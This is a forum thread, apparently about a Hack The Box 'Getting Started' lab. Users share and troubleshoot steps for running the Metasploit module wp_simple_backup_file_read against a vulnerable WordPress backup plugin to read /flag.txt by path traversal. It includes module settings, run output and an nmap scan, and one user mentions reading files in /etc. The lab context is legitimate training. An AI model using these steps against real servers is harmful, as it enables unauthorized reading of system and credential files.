Getting Started | Public Exploit | Quick solve

Hello, its x69h4ck3r, i am gonna make this straight forward as possible,

cos you ma have spent hours on this.

Ok!, lets jump into it.

Step 1: Search for the plugin exploit on the web.
example; search on like this; “Backup Plugin 2.7.10 for WordPress exploit”
when done, you will get lots of result.
pick the one with rapid7, its short…

in rapid7 the metasploit exploit for this vulnerability
is shown; “wp_simple_backup_file_read”.
we then go in our terminal and fire up the metasploit framework
in other to use this exploit on our target server.

Step 2: Fire up the metasploit DataBase.

this command in your terminal to start up the postgresl db

systemctl start postgresql

this command to run the metasploit


search for the exploit using this command

search exploit wordpress plugin backup

locate “wp_simple_backup_file_read” and use the command bellow

use auxiliary/scanner/http/wp_simple_backup_file_read

when in the command, type “show options”

change the rhosts to the target_ip;

change rport to the target_port

change filepath to /flag.txt

press enter, cross-check your parameters by using the “show options” command

once satisfied, type the “run or exploit” command to get the exploit working,

and the flag will be downloaded into the .msf4/loot/ folder

you can use "locate /.msf4/loot/ " to locate and pivot into the directory

and then read the file with the “cat” command…

i hope this was useful… please like and comment, let me know if this solved your problem.



When I do this, nothing downloads into the loot folder. It just says:

msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Here are my options for reference:

msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > options

Module options (auxiliary/scanner/http/wp_simple_backup_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /flag.txt        yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     yes       The target host(s), see
   RPORT      30633            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

What do you think? What am I doing wrong? Is there something wrong with the box?

I’ll just reply to myself. I ended up using pwnbox and it worked lol. Hours later. ugh

for the record, I also tried it with just “flag.txt” (no quotes) as the filepath… and a lot of other things, including a bunch of stuff you’d expect to see in /etc

Your settings are correct. I just ran it with this and was successful. Not sure why it wouldn’t have worked.

Thank You so much mate. That really worked :smiley:

For a minute I took got confused when I didn’t see the msf output. Later I realized I forgot to set the RPORT associated to the target IP. Once I did I got the output.

See whether all the parameters are provided.

Two questions:
1). The nmap of my Target Instance is as follows:
nmap -sV -A -p<Target Instance Port #> <Target Instance IP address without Port #>
<Target Instance Port #>/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.6.1
|_http-title: Getting Started – Just another WordPress site
|_http-server-header: Apache/2.4.41 (Ubuntu)

How should we know to target the WordPress application and not Apache 2.4.41?

2). How would we know (aside from the tip) to use a ‘plugin’ type of attack against the WordPress application?

If anyone isn’t getting a file output, sudoing msfconsole worked for me

Well, that was annoying. Why would it work using pwnbox but not my regular machine…

It’s asking for a password…